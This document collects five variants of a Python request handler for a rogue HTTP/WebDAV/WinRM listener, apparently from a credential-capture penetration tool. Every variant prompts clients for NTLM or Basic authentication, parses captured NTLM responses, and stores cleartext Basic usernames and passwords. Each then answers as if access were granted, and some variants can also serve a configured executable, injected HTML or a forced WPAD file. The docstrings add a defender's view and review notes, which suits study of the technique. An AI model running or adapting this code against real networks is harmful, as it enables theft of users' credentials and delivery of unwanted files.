Exemplo n.º 1
def PacketSequence(data, client, Challenge):
	"""Select the reply for one request seen by the WinRM listener.

	The request text is searched for an ``Authorization`` header using the
	NTLM, Negotiate or Basic scheme:

	* NTLM/Negotiate, message type 1: a challenge built from ``Challenge``
	  is returned (WinRM answer for Negotiate, IIS answer for NTLM).
	* NTLM/Negotiate, message type 3: the decoded message goes to
	  ``ParseHTTPHash`` and an "auth granted" page is returned.
	* Basic: the decoded user name and password are stored with
	  ``SaveToDb`` and an "auth granted" page is returned.
	* None of these: a 401 asking for Basic or NTLM, depending on
	  ``settings.Config.Basic``.

	Defender's view: nothing here verifies a credential. Whatever a client
	submits is stored or parsed and then answered as if it had succeeded,
	so a client that authenticates automatically to this listener has
	already disclosed its Basic password or NTLM response. The relevant
	controls are client-side: no Basic over cleartext HTTP, and automatic
	NTLM only towards trusted hosts.

	:param data: raw HTTP request text.
	:param client: client identifier used in log lines and stored records.
	:param Challenge: server challenge placed in the NTLM type 2 message.
	:returns: the response object, or ``None`` when the NTLM message type
		is neither 1 nor 3.
	"""
	ntlm_tokens = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
	negotiate_tokens = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
	basic_tokens = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

	if not ntlm_tokens and not negotiate_tokens:
		if basic_tokens:
			# Basic is only base64, so this is the password itself.
			# NOTE(review): a value without ':' raises IndexError below.
			fields = b64decode(''.join(basic_tokens)).decode('latin-1').split(':')
			SaveToDb({
				'module': 'WinRM',
				'type': 'Basic',
				'client': client,
				'user': fields[0],
				'cleartext': fields[1],
			})
			granted = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
			granted.calculate()
			return granted

		# No usable Authorization header yet: ask the client to authenticate.
		if settings.Config.Basic:
			reply = IIS_Basic_401_Ans()
			if settings.Config.Verbose:
				print(text("[WinRM] Sending BASIC authentication request to %s" % client))
		else:
			reply = IIS_Auth_401_Ans()
			if settings.Config.Verbose:
				print(text("[WinRM] Sending NTLM authentication request to %s" % client))
		return reply

	# Byte 8 of the decoded blob follows the 8-byte NTLMSSP signature and
	# carries the message type. Negotiate is decoded first and NTLM second,
	# so when both headers are present the NTLM one decides the type.
	if negotiate_tokens:
		message_type = b64decode(''.join(negotiate_tokens))[8:9]
	if ntlm_tokens:
		message_type = b64decode(''.join(ntlm_tokens))[8:9]

	if message_type == b'\x01':
		challenge_msg = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
		challenge_msg.calculate()
		answer_cls = WinRM_NTLM_Challenge_Ans if negotiate_tokens else IIS_NTLM_Challenge_Ans
		return answer_cls(Payload=b64encode(NetworkSendBufferPython2or3(challenge_msg)).decode('latin-1'))

	if message_type == b'\x03':
		# The Negotiate header wins here when both schemes were sent.
		chosen_tokens = negotiate_tokens if negotiate_tokens else ntlm_tokens
		auth_message = b64decode(''.join(chosen_tokens))

		ParseHTTPHash(auth_message, Challenge, client, "WinRM")
		granted = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
		granted.calculate()
		return granted

	# Any other message type gets no reply from this function.
	return None
Exemplo n.º 2
def PacketSequence(data, client):
    """Choose the reply for one request received by the HTTP listener.

    Python 2 code: it uses ``print`` statements and compares the decoded
    NTLM byte against ``str`` literals.

    Decisions are taken in this order, first match wins:

    1. ``Serve_Always`` / ``Serve_Exe``: reply with the configured
       executable through ``RespondWithFile``.
    2. ``Serve_Html``: reply with the configured HTML file.
    3. ``Authorization: NTLM``: message type 1 gets an NTLM challenge,
       message type 3 is decoded and passed to ``ParseHTTPHash``.
    4. ``Authorization: Basic``: the decoded user name and password are
       stored with ``SaveToDb``.
    5. No such header: a 401 asking for Basic or NTLM.

    Defender's view: nothing here verifies a credential. After steps 3
    (type 3) and 4 the client is answered with the custom WPAD file or an
    "auth granted" page, so a client that authenticates automatically to
    this listener has already disclosed its Basic password or NTLM
    response.

    :param data: raw HTTP request text.
    :param client: client identifier used in log lines and stored records.
    :returns: the response to send, or ``None`` when the NTLM message type
        is neither 1 nor 3.
    """
    # Everything after the scheme name up to the end of the header line.
    NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
    Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

    # Serve the .exe if needed
    # NOTE(review): '.exe' is used as a regex, so the dot matches any
    # character; any request containing "exe" after some character matches.
    if settings.Config.Serve_Always == True or (
            settings.Config.Serve_Exe == True and re.findall('.exe', data)):
        return RespondWithFile(client, settings.Config.Exe_Filename,
                               settings.Config.Exe_DlName)

    # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    # Computed up front; only returned below when Force_WPAD_Auth is set.
    WPAD_Custom = WpadCustom(data, client)

    if NTLM_Auth:
        # Byte 8 follows the 8-byte NTLMSSP signature and carries the
        # message type.
        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

        # Type 1 (negotiate): call the Grab* helpers (defined elsewhere)
        # and answer with a challenge built from the configured value.
        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))

            return str(Buffer_Ans)

        # Type 3 (authenticate): the full decoded message goes to
        # ParseHTTPHash (defined elsewhere; presumably extracts and stores
        # the response - confirm).
        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode(''.join(NTLM_Auth))
            ParseHTTPHash(NTLM_Auth, client)

            # NOTE(review): this print is not gated on Config.Verbose,
            # unlike the same message in the Basic branch.
            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)
                return WPAD_Custom

            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

        # Any other message type falls through and returns None.

    elif Basic_Auth:
        # Basic is only base64, so this is the password itself.
        ClearText_Auth = b64decode(''.join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        # NOTE(review): a decoded value without ':' raises IndexError on
        # the 'cleartext' entry.
        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': ClearText_Auth.split(':')[0],
            'cleartext': ClearText_Auth.split(':')[1],
        })

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)
            return WPAD_Custom

        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)

    else:
        # No usable Authorization header: ask the client to authenticate
        # with the scheme selected in the configuration.
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text(
                    "[HTTP] Sending BASIC authentication request to %s" %
                    client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" %
                           client)

        return str(Response)
Exemplo n.º 3
def PacketSequence(data, client):
	"""Choose the reply for one request received by the HTTP listener.

	Python 2 code: it uses ``print`` statements and compares the decoded
	NTLM byte against ``str`` literals.

	Decisions are taken in this order, first match wins: serve the
	configured executable, serve the configured HTML file, handle an
	``Authorization: NTLM`` header (type 1 gets a challenge, type 3 is
	passed to ``ParseHTTPHash``), handle an ``Authorization: Basic``
	header (user name and password stored with ``SaveToDb``), otherwise
	return a 401 asking for Basic or NTLM.

	Defender's view: nothing here verifies a credential. A client that
	authenticates automatically to this listener is answered with the
	custom WPAD file or an "auth granted" page after its Basic password
	or NTLM response has been handed to the storage/parsing helpers.

	:param data: raw HTTP request text.
	:param client: client identifier used in log lines and stored records.
	:returns: the response to send, or ``None`` when the NTLM message type
		is neither 1 nor 3.
	"""
	# Everything after the scheme name up to the end of the header line.
	NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
	Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

	# Serve the .exe if needed
	# NOTE(review): '.exe' is used as a regex, so the dot matches any
	# character; any request containing "exe" after some character matches.
	if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
		return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

	# Serve the custom HTML if needed
	if settings.Config.Serve_Html == True:
		return RespondWithFile(client, settings.Config.Html_Filename)

	# Computed up front; only returned below when Force_WPAD_Auth is set.
	WPAD_Custom = WpadCustom(data, client)
	
	if NTLM_Auth:
		# Byte 8 follows the 8-byte NTLMSSP signature and carries the
		# message type.
		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

		# Type 1 (negotiate): call the Grab* helpers (defined elsewhere)
		# and answer with a challenge built from the configured value.
		if Packet_NTLM == "\x01":
			GrabURL(data, client)
			GrabHost(data, client)
			GrabCookie(data, client)

			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
			Buffer.calculate()

			Buffer_Ans = IIS_NTLM_Challenge_Ans()
			Buffer_Ans.calculate(str(Buffer))

			return str(Buffer_Ans)

		# Type 3 (authenticate): the full decoded message goes to
		# ParseHTTPHash (defined elsewhere; presumably extracts and stores
		# the response - confirm).
		if Packet_NTLM == "\x03":
			NTLM_Auth = b64decode(''.join(NTLM_Auth))
			ParseHTTPHash(NTLM_Auth, client)

			# NOTE(review): this print is not gated on Config.Verbose,
			# unlike the same message in the Basic branch.
			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
				print text("[HTTP] WPAD (auth) file sent to %s" % client)
				return WPAD_Custom

			else:
				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
				Buffer.calculate()
				return str(Buffer)

		# Any other message type falls through and returns None.

	elif Basic_Auth:
		# Basic is only base64, so this is the password itself.
		ClearText_Auth = b64decode(''.join(Basic_Auth))

		GrabURL(data, client)
		GrabHost(data, client)
		GrabCookie(data, client)

		# NOTE(review): a decoded value without ':' raises IndexError on
		# the 'cleartext' entry.
		SaveToDb({
			'module': 'HTTP', 
			'type': 'Basic', 
			'client': client, 
			'user': ClearText_Auth.split(':')[0], 
			'cleartext': ClearText_Auth.split(':')[1], 
		})

		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
			if settings.Config.Verbose:
				print text("[HTTP] WPAD (auth) file sent to %s" % client)
			return WPAD_Custom

		else:
			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
			Buffer.calculate()
			return str(Buffer)

	else:
		# No usable Authorization header: ask the client to authenticate
		# with the scheme selected in the configuration.
		if settings.Config.Basic == True:
			Response = IIS_Basic_401_Ans()
			if settings.Config.Verbose:
				print text("[HTTP] Sending BASIC authentication request to %s" % client)

		else:
			Response = IIS_Auth_401_Ans()
			if settings.Config.Verbose:
				print text("[HTTP] Sending NTLM authentication request to %s" % client)

		return str(Response)
Exemplo n.º 4
def PacketSequence(data, client, Challenge):
    """Select the reply for one request seen by the HTTP/WebDAV listener.

    Decisions are taken in this order, first match wins:

    1. ``Serve_Always`` / ``Serve_Exe``: reply with the configured
       executable through ``RespondWithFile``.
    2. ``Serve_Html``: reply with the configured HTML file.
    3. ``ServeOPTIONS(data)`` is truthy: return its result (WebDAV).
    4. ``Authorization: NTLM``: message type 1 gets a challenge built from
       ``Challenge``; message type 3 is decoded and passed to
       ``ParseHTTPHash`` tagged "WebDAV" or "HTTP".
    5. ``Authorization: Basic``: the decoded user name and password are
       stored with ``SaveToDb``.
    6. No such header: a 401 asking for Basic or NTLM.

    Defender's view: nothing here verifies a credential. After steps 4
    (type 3) and 5 the client is answered with the custom WPAD file or an
    "auth granted" page, so a client that authenticates automatically to
    this listener has already disclosed its Basic password or NTLM
    response. The relevant controls are client-side: no Basic over
    cleartext HTTP, and automatic NTLM only towards trusted hosts.

    :param data: raw HTTP request text.
    :param client: client identifier used in log lines and stored records.
    :param Challenge: server challenge placed in the NTLM type 2 message.
    :returns: the response to send, or ``None`` when the NTLM message type
        is neither 1 nor 3.
    """
    ntlm_tokens = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
    basic_tokens = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

    # NOTE(review): '.exe' is used as a regex, so the dot matches any
    # character; any request containing "exe" after some character matches.
    serve_executable = settings.Config.Serve_Always is True or (
        settings.Config.Serve_Exe is True and re.findall('.exe', data))
    if serve_executable:
        return RespondWithFile(
            client,
            settings.Config.Exe_Filename,
            settings.Config.Exe_DlName,
        )

    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    # Computed up front; only returned below when Force_WPAD_Auth is set.
    wpad_reply = WpadCustom(data, client)

    # WebDAV: the helper is deliberately called twice, as before, once to
    # test and once to produce the reply.
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if not ntlm_tokens and not basic_tokens:
        # No usable Authorization header: ask the client to authenticate
        # with the scheme selected in the configuration.
        if settings.Config.Basic:
            reply = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print(text("[HTTP] Sending BASIC authentication request to %s" % client))
        else:
            reply = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print(text("[HTTP] Sending NTLM authentication request to %s" % client))
        return reply

    if not ntlm_tokens:
        # Basic is only base64, so this is the password itself.
        credentials = b64decode(''.join(basic_tokens))

        for grab in (GrabURL, GrabReferer, GrabHost, GrabCookie):
            grab(data, client)

        # NOTE(review): a decoded value without ':' raises IndexError here.
        fields = credentials.decode('latin-1').split(':')
        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': fields[0],
            'cleartext': fields[1],
        })

        if settings.Config.Force_WPAD_Auth and wpad_reply:
            if settings.Config.Verbose:
                print(text("[HTTP] WPAD (auth) file sent to %s" % client))
            return wpad_reply

        granted = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
        granted.calculate()
        return NetworkSendBufferPython2or3(granted)

    # Byte 8 follows the 8-byte NTLMSSP signature and carries the message
    # type.
    message_type = b64decode(''.join(ntlm_tokens))[8:9]

    if message_type == b'\x01':
        for grab in (GrabURL, GrabReferer, GrabHost, GrabCookie):
            grab(data, client)

        challenge_msg = NTLM_Challenge(
            ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
        challenge_msg.calculate()

        encoded = b64encode(NetworkSendBufferPython2or3(challenge_msg))
        return IIS_NTLM_Challenge_Ans(Payload=encoded.decode('latin-1'))

    if message_type == b'\x03':
        auth_message = b64decode(''.join(ntlm_tokens))
        module = "WebDAV" if IsWebDAV(data) else "HTTP"
        ParseHTTPHash(auth_message, Challenge, client, module)

        if settings.Config.Force_WPAD_Auth and wpad_reply:
            # Printed regardless of Config.Verbose, unlike the Basic path.
            print(text("[HTTP] WPAD (auth) file sent to %s" % client))
            return wpad_reply

        granted = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
        granted.calculate()
        return NetworkSendBufferPython2or3(granted)

    # Any other message type gets no reply from this function.
    return None
Exemplo n.º 5
def PacketSequence(data, client):
    """Choose the reply for one request received by the HTTP/WebDAV listener.

    Python 2 code: it uses ``print`` statements and compares the decoded
    NTLM byte against ``str`` literals.

    Decisions are taken in this order, first match wins: serve the
    configured executable, serve the configured HTML file, return the
    ``ServeOPTIONS`` result when it is truthy, handle an
    ``Authorization: NTLM`` header (type 1 gets a challenge, type 3 is
    passed to ``ParseHTTPHash`` tagged "WebDAV" or "HTTP"), handle an
    ``Authorization: Basic`` header (user name and password stored with
    ``SaveToDb``), otherwise return a 401 asking for Basic or NTLM.

    Defender's view: nothing here verifies a credential. A client that
    authenticates automatically to this listener is answered with the
    custom WPAD file or an "auth granted" page after its Basic password
    or NTLM response has been handed to the storage/parsing helpers.

    :param data: raw HTTP request text.
    :param client: client identifier used in log lines and stored records.
    :returns: the response to send, or ``None`` when the NTLM message type
        is neither 1 nor 3.
    """
    # Everything after the scheme name up to the end of the header line.
    NTLM_Auth = re.findall(r"(?<=Authorization: NTLM )[^\r]*", data)
    Basic_Auth = re.findall(r"(?<=Authorization: Basic )[^\r]*", data)

    # Serve the .exe if needed
    # NOTE(review): ".exe" is used as a regex, so the dot matches any
    # character; any request containing "exe" after some character matches.
    if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall(".exe", data)):
        return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

    # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    # Computed up front; only returned below when Force_WPAD_Auth is set.
    WPAD_Custom = WpadCustom(data, client)
    # Webdav
    # NOTE(review): ServeOPTIONS is called twice, once to test and once to
    # produce the reply.
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if NTLM_Auth:
        # Byte 8 follows the 8-byte NTLMSSP signature and carries the
        # message type.
        Packet_NTLM = b64decode("".join(NTLM_Auth))[8:9]
        # Type 1 (negotiate): call the Grab* helpers (defined elsewhere)
        # and answer with a challenge built from the configured value.
        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))
            return str(Buffer_Ans)

        # Type 3 (authenticate): the full decoded message goes to
        # ParseHTTPHash (defined elsewhere; presumably extracts and stores
        # the response - confirm), tagged with the module it arrived on.
        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode("".join(NTLM_Auth))
            if IsWebDAV(data):
                module = "WebDAV"
            else:
                module = "HTTP"
            ParseHTTPHash(NTLM_Auth, client, module)

            # NOTE(review): this print is not gated on Config.Verbose,
            # unlike the same message in the Basic branch.
            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

                return WPAD_Custom
            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

        # Any other message type falls through and returns None.

    elif Basic_Auth:
        # Basic is only base64, so this is the password itself.
        ClearText_Auth = b64decode("".join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        # NOTE(review): a decoded value without ":" raises IndexError on
        # the "cleartext" entry.
        SaveToDb(
            {
                "module": "HTTP",
                "type": "Basic",
                "client": client,
                "user": ClearText_Auth.split(":")[0],
                "cleartext": ClearText_Auth.split(":")[1],
            }
        )

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

            return WPAD_Custom
        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)
    else:
        # No usable Authorization header: ask the client to authenticate
        # with the scheme selected in the configuration.
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending BASIC authentication request to %s" % client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" % client)

        return str(Response)